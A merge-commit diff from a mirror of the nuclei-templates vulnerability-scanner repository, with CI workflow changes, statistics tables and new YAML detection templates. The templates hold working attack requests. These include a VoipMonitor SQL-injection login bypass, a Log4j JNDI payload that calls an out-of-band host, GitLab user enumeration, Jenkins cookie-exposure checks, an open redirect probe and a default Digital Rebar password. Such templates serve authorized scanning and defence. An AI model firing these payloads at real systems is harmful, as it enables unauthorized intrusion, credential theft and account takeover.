daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-03-07 08:10:22 -05:00 committed by GitHub
parent 2ad1854752 04767227cc
commit 21d872d42c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
19 changed files with 1761 additions and 1417 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
.github/workflows/cve-annotate.yml vendored
View File

@ -10,23 +10,25 @@ jobs:
docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- uses: actions/checkout@v2
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup CVE annotate
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
sudo unzip cve-annotate.zip -d /usr/local/bin
working-directory: /tmp
- name: Generate CVE Annotations
id: cve-annotate
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
@ -44,4 +46,4 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
branch: ${{ github.ref }}

22
.github/workflows/template-validate.yml vendored
View File

@ -6,25 +6,17 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/checkout@v2
- name: Get latest Nuclei release version
id: nuclei-latest
uses: actions/github-script@v5
with:
result-encoding: string
script: |
const release = await github.rest.repos.getLatestRelease({
owner: 'projectdiscovery',
repo: 'nuclei',
});
return release.data.name
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup Nuclei
if: steps.nuclei-latest.outputs.result != ''
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.nuclei-latest.outputs.result }}
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin

49
.new-additions
View File

@ -1,46 +1,3 @@
cnvd/2019/CNVD-2019-19299.yaml
cnvd/2019/CNVD-2019-32204.yaml
cnvd/2021/CNVD-2021-09650.yaml
cnvd/2021/CNVD-2021-15824.yaml
cnvd/2022/CNVD-2022-03672.yaml
cves/2017/CVE-2017-18598.yaml
cves/2018/CVE-2018-16716.yaml
cves/2018/CVE-2018-18264.yaml
cves/2018/CVE-2018-19365.yaml
cves/2019/CVE-2019-9726.yaml
cves/2020/CVE-2020-35234.yaml
cves/2021/CVE-2021-24762.yaml
cves/2021/CVE-2021-41192.yaml
cves/2021/CVE-2021-44521.yaml
cves/2022/CVE-2022-21371.yaml
cves/2022/CVE-2022-22536.yaml
cves/2022/CVE-2022-22947.yaml
cves/2022/CVE-2022-23134.yaml
cves/2022/CVE-2022-24124.yaml
exposed-panels/casdoor-login.yaml
exposed-panels/digitalrebar-login.yaml
exposed-panels/directum-login.yaml
exposed-panels/homematic-panel.yaml
exposed-panels/issabel-login.yaml
exposed-panels/librenms-login.yaml
exposed-panels/ocs-inventory-login.yaml
exposed-panels/phoronix-pane;.yaml
exposed-panels/raspberrymatic-panel.yaml
exposed-panels/redash-panel.yaml
exposed-panels/subrion-login.yaml
exposures/configs/prometheus-metrics.yaml
misconfiguration/gitlab/gitlab-uninitialized-password.yaml
technologies/empirecms-detect.yaml
technologies/jeecg-boot-detect.yaml
technologies/livehelperchat-detect.yaml
technologies/microweber-detect.yaml
technologies/php-fusion-detect.yaml
technologies/piwigo-detect.yaml
technologies/snipeit-panel.yaml
technologies/subrion-cms-detect.yaml
token-spray/api-launchdarkly.yaml
vulnerabilities/cisco/cucm-username-enumeration.yaml
vulnerabilities/other/microweber-xss.yaml
vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
vulnerabilities/wordpress/wp-adaptive-xss.yaml
vulnerabilities/wordpress/wp-qards-listing.yaml
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
**221 directories, 3173 files**.
**222 directories, 3221 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

2641
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |

2
cnvd/2019/CNVD-2019-19299.yaml
View File

@ -1,7 +1,7 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
name: Zhiyuan A8 Arbitrary File Write (RCE)
author: daffainfo
severity: critical
reference:

56
cves/2019/CVE-2019-10405.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2019-10405
info:
name: Diagnostic page exposed Cookie HTTP header
severity: medium
author: c-sh0
description: Jenkins 2.196 and earlier, LTS 2.176.3 and earlier printed the value of the Cookie on the /whoAmI/ URL
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-10405
- https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505
metadata:
shodan-query: http.favicon.hash:81586312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.30
cve-id: CVE-2019-10405
cwe-id: CWE-200
tags: cve,cve2019,jenkins
requests:
- raw:
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/html'
- 'x-jenkins'
condition: and
case-insensitive: true
- type: word
part: body_2
words:
- 'Cookie'
- 'JSESSIONID'
condition: and
extractors:
- type: kval
kval:
- x_jenkins

56
cves/2020/CVE-2020-2103.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2020-2103
info:
name: Diagnostic page exposed session cookies
severity: medium
author: c-sh0
description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-2103
- https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695
metadata:
shodan-query: http.favicon.hash:81586312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2020-2103
cwe-id: CWE-200
tags: cve,cve2020,jenkins
requests:
- raw:
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/html'
- 'x-jenkins'
condition: and
case-insensitive: true
- type: word
part: body_2
words:
- 'Cookie'
- 'SessionId: null'
condition: and
extractors:
- type: kval
kval:
- x_jenkins

49
cves/2021/CVE-2021-4191.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2021-4191
info:
name: GitLab GraphQL API User Enumeration
author: zsusac
severity: medium
description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
reference:
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
classification:
cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-4191
cwe-id: CWE-359
tags: cve,cve2021,gitlab,api,graphql,enum,unauth
requests:
- raw:
- |
POST /api/graphql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: */*
Origin: {{RootURL}}
Referer: {{RootURL}}/-/graphql-explorer
{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"data"'
- '"users"'
- '"nodes"'
- '"id"'
- 'gid://'
condition: and
- type: status
status:
- 200
extractors:
- type: json
json:
- '.data.users.nodes[].username'

27
cves/2022/CVE-2022-0692.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2022-0692
info:
name: Rudloff alltube prior to 3.0.1 - Open Redirect
author: 0x_Akoko
severity: medium
description: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1
reference:
- https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
- https://www.cvedetails.com/cve/CVE-2022-0692
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2022-0692
cwe-id: CWE-601
tags: cve,cve2022,redirect,rudloff,alltube
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

6
cves/2022/CVE-2022-22536.yaml
View File

@ -53,7 +53,7 @@ requests:
- type: word
part: body
words:
- "400 Bad Request" # error in concatenated response
- "500 Internal Server Error"
- "500 Dispatching Error"
- "HTTP/1.0 400 Bad Request" # error in concatenated response
- "HTTP/1.0 500 Internal Server Error"
- "HTTP/1.0 500 Dispatching Error"
condition: or

43
cves/2022/CVE-2022-23779.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2022-23779
info:
name: Zoho ManageEngine - Internal Hostname Disclosure
author: cckuailong
severity: medium
description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.
reference:
- https://www.manageengine.com/products/desktop-central/cve-2022-23779.html
- https://github.com/fbusr/CVE-2022-23779
- https://nvd.nist.gov/vuln/detail/CVE-2022-23779
metadata:
fofa-query: app="ZOHO-ManageEngine-Desktop"
tags: cve,cve2022,zoho,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/themes"
matchers-condition: and
matchers:
- type: status
status:
- 301
- type: word
part: header
words:
- '/themes/'
- 'text/html'
condition: and
- type: dsl
dsl:
- '!contains(location,host)'
extractors:
- type: regex
part: header
group: 1
regex:
- 'https?:\/\/(.*):'

47
cves/2022/CVE-2022-24260.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2022-24260
info:
name: VoipMonitor - Pre-Auth SQL injection
author: gy741
severity: critical
description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
reference:
- https://kerbit.io/research/read/blog/3
- https://nvd.nist.gov/vuln/detail/CVE-2022-24260
- https://www.voipmonitor.org/changelog-gui?major=5
metadata:
shodan-query: http.title:"VoIPmonitor"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 9.80
cve-id: CVE-2022-24260
cwe-id: CWE-89
tags: cve,cve2022,voipmonitor,sqli,unauth
requests:
- raw:
- |
POST /api.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #
matchers-condition: and
matchers:
- type: word
words:
- '"success":true'
- '_vm_version'
- '_debug'
condition: and
- type: status
status:
- 200
extractors:
- type: kval
kval:
- PHPSESSID

40
default-logins/digitalrebar/digitalrebar-default-login.yaml Normal file
View File

@ -0,0 +1,40 @@
id: digitalrebar-default-login
info:
name: RackN Digital Rebar provision default login
author: c-sh0
severity: high
reference: https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
tags: rackn,digitalrebar,default-login
requests:
- raw:
- |
GET /api/v3/users HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- rocketskates
password:
- r0cketsk8ts
attack: pitchfork
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: header
regex:
- '(?i)(X-Drp-)'
- type: word
part: body
words:
- 'Name'
- 'Secret'
condition: and

25
technologies/jenkins-detect.yaml
View File

@ -1,32 +1,39 @@
id: jenkins-detect
info:
name: Jenkins detect (version)
author: philippdelteil,daffainfo
name: Jenkins Detection
author: philippdelteil,daffainfo,c-sh0
severity: info
reference:
- https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-DetectingJenkinsversion
- https://github.com/jenkinsci/jenkins/pull/470
- https://www.jenkins.io/doc/book/security/access-control/permissions/#access-granted-without-overallread
metadata:
shodan-query: http.favicon.hash:81586312
tags: tech,jenkins
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/whoAmI/"
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "X-Jenkins"
- "X-Jenkins-Session"
part: header
condition: and
words:
- "x-jenkins"
case-insensitive: true
- type: word
words:
- "<title>Dashboard [Jenkins]</title>"
part: body
- "Jenkins"
extractors:
- type: kval
part: header
kval:
- x_jenkins

2
vulnerabilities/cisco/cucm-username-enumeration.yaml
View File

@ -1,7 +1,7 @@
id: cucm-username-enumeration
info:
name: Cisco Unified Call Manager (CUCM) User Data Services Username Enumeration API - Unauthenticated
name: Cisco Unified Call Manager Username Enumeration
author: manasmbellani
severity: medium
reference: https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/

41
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml Normal file
View File

@ -0,0 +1,41 @@
id: vrealize-operations-log4j-rce
info:
name: vRealize Operations Tenant App Log4j JNDI RCE
author: bughuntersurya
severity: critical
description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted vRealize Operations Tenant Application.
reference: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
metadata:
shodan-query: http.title:"vRealize Operations Tenant App"
tags: rce,log4j,vmware,vrealize
requests:
- raw:
- |
POST /suite-api/api/auth/token/acquire HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/ui/
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns" # Confirms the DNS Interaction
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output